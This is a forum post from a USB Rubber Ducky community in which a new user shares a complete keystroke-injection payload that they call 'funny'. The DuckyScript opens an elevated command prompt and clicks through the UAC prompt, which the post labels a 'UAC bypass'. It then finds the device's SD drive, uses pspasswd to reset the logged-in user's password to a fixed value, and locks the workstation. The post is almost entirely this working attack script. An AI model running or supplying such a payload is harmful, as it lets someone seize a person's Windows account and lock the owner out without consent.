Jump to content

Lock current user out

ChrizDoe

By ChrizDoe
in Classic USB Rubber Ducky

 Share

Recommended Posts

ChrizDoe Newbie

ChrizDoe

Posted
Posted (edited)

Hey folks,

got my duck yesterday and made my first little payload for it. Its a very simple one but i think its quite funny.

REM Changes the current users password and locks the machine
REM
REM Firmware: c_duck_v2.1.hex  (needs SD Card access)
REM sd card label: DUCKY
REM needs pspasswd.exe from pstools from 
REM http://technet.microsoft.com/de-de/sysinternals/bb896649.aspx
REM
REM Target: Windows Vista/7/8, Win32/x64
REM Props to the hak5 forum


REM *** UAC Bypass
DELAY 2000
GUI r
DELAY 200
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 1000
ALT j
DELAY 500
BACKSPACE

REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER

DELAY 500

REM *** Run PsPasswd on Ducky Drive
REM *** Change Password of current user to 'newPassword'
STRING %duck%\pspasswd %username% newPassword
ENTER

DELAY 1000

STRING rundll32.exe user32.dll, LockWorkStation
ENTER

DELAYs probably not optimal.

Regards

Edited by ChrizDoe
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...